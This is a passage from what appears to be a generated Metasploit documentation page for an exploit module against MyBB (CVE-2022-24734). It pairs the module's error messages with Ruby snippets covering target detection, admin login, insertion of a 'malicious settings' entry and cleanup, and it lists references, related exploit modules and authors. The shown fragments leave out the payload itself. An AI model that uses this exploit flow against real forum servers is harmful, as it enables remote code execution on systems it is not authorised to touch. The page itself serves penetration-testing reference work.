123:
124: # see https://github.com/mybb/mybb/blob/feature/inc/class_core.php#L307-L310
125: unless res.body.include?('MYBB')
126: return CheckCode::Unknown("#{peer} - Cannot find MyBB forum running at #{target_uri.path}")
127: end
128:
129: print_good("MyBB forum found running at #{target_uri.path}")
130:
131: return CheckCode::Detected
<PEER> - Could not connect to web service - no response
Here is a relevant code snippet related to the "<PEER> - Could not connect to web service - no response" error message:
143: 'username' => datastore['USERNAME'],
144: 'password' => datastore['PASSWORD'],
145: 'do' => 'login'
146: }
147: })
148: fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
149: unless res.body.match(/Logged in as .*#{datastore['USERNAME']}/)
150: fail_with(Failure::NoAccess, "#{peer} - Invalid credentials")
151: end
152:
153: print_good('Login successful!')
<PEER> - Invalid credentials
Here is a relevant code snippet related to the "<PEER> - Invalid credentials" error message:
145: 'do' => 'login'
146: }
147: })
148: fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
149: unless res.body.match(/Logged in as .*#{datastore['USERNAME']}/)
150: fail_with(Failure::NoAccess, "#{peer} - Invalid credentials")
151: end
152:
153: print_good('Login successful!')
154: end
155:
<PEER> - Could not connect to web service - no response
Here is a relevant code snippet related to the "<PEER> - Could not connect to web service - no response" error message:
163: }.merge(vars_get)
164: }
165: req_hash['vars_post'] = vars_post unless vars_post.blank?
166: res = send_request_cgi(req_hash, datastore['WfsDelay'] > 0 ? datastore['WfsDelay'] : 2)
167: if check_response && res.nil?
168: fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response")
169: end
170: res
171: end
172:
173: def exploit
<PEER> - Supplied user doesn't have the rights to add a setting
Here is a relevant code snippet related to the "<PEER> - Supplied user doesn't have the rights to add a setting" error message:
173: def exploit
174: login
175:
176: res = send_config_settings
177: if res.body.include?('Access Denied')
178: fail_with(Failure::NoAccess, "#{peer} - Supplied user doesn't have the rights to add a setting")
179: end
180:
181: vprint_status('Adding a malicious settings')
182: doc = res.get_html_document
183: @my_post_key = doc.xpath('//input[@name="my_post_key"]/@value').text
User session is not valid anymore. Trying to login again to cleanup
Here is a relevant code snippet related to the "User session is not valid anymore. Trying to login again to cleanup" error message:
246:
247: vprint_status('Grab the delete parameters')
248: res = send_config_settings(action: 'manage')
249: if res.body.include?('<title>MyBB Control Panel - Login</title>')
250: # this exploit seems to logout users sometimes, so, try to login again and retry
251: print_status('User session is not valid anymore. Trying to login again to cleanup')
252: login
253: res = send_config_settings(action: 'manage')
254: end
255:
256: doc = res.get_html_document
<PEER> - URI not found in `Modify Settings` page - cannot cleanup
Here is a relevant code snippet related to the "<PEER> - URI not found in `Modify Settings` page - cannot cleanup" error message:
257: control_links = doc.xpath('//div[@class="popup_item_container"]/a/@href')
258: uri = control_links.detect do |href|
259: href.text.include?('action=delete') && href.text.include?("my_post_key=#{@my_post_key}")
260: end
261: if uri.nil?
262: print_warning("#{peer} - URI not found in `Modify Settings` page - cannot cleanup")
263: return
264: end
265:
266: vprint_status('Send the delete request')
267: params = uri.text.split('?')[1]
Go back to menu.
Related Pull Requests
- #16650 Merged Pull Request: Add #read_from_file for MSSQL and PostgreSQL, fix the MySQL implementation
- #16602 Merged Pull Request: Fix error when service is already running and update exception documentation in lib/msf/core/post/windows/services.rb
- #16627 Merged Pull Request: Add some error handling to update_payload_cache_size script
- #16679 Merged Pull Request: Fix missing and incomplete specs
- #16654 Merged Pull Request: Add named pipe pivot documentation
- #16571 Merged Pull Request: Vcenter offline mdb extract
- #16667 Merged Pull Request: Weekly dependency updates for Gemfile.lock
- #16666 Merged Pull Request: Correctly format the notes sections
- #16665 Merged Pull Request: Fix random compile c tool
- #16662 Merged Pull Request: Add faraday retry gem dependency
References
- https://github.com/mybb/mybb/security/advisories/GHSA-876v-gwgh-w57f
- https://www.zerodayinitiative.com/advisories/ZDI-22-503/
- https://github.com/Altelus1/CVE-2022-24734
- CVE-2022-24734
See Also
Check also the following modules related to this module:
- auxiliary/gather/mybb_db_fingerprint
- exploit/unix/webapp/mybb_backdoor
- exploit/multi/http/cve_2021_35464_forgerock_openam
- exploit/multi/browser/chrome_cve_2021_21220_v8_insufficient_validation
- exploit/multi/sap/cve_2020_6207_solman_rs
- exploit/linux/fileformat/unrar_cve_2022_30333
- exploit/linux/http/apache_spark_rce_cve_2022_33891
- exploit/linux/http/f5_icontrol_rpmspec_rce_cve_2022_41800
- exploit/linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622
- exploit/linux/http/flir_ax8_unauth_rce_cve_2022_37061
- exploit/linux/http/fortinet_authentication_bypass_cve_2022_40684
- exploit/linux/http/vmware_workspace_one_access_cve_2022_22954
- exploit/linux/http/zimbra_cpio_cve_2022_41352
- exploit/linux/http/zimbra_mboximport_cve_2022_27925
- exploit/linux/http/zimbra_unrar_cve_2022_30333
- exploit/linux/local/cve_2022_0847_dirtypipe
- exploit/linux/local/cve_2022_0995_watch_queue
- exploit/windows/http/manageengine_adaudit_plus_cve_2022_28219
- exploit/windows/http/manageengine_adselfservice_plus_cve_2022_28810
- exploit/windows/local/cve_2022_21882_win32k
- exploit/windows/local/cve_2022_21999_spoolfool_privesc
- exploit/windows/local/cve_2022_26904_superprofile
- exploit/windows/misc/cve_2022_28381_allmediaserver_bof
Authors
- Cillian Collins
- Altelus
- Christophe De La Fuente
Version
This page has been produced using Metasploit Framework version 6.2.29-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.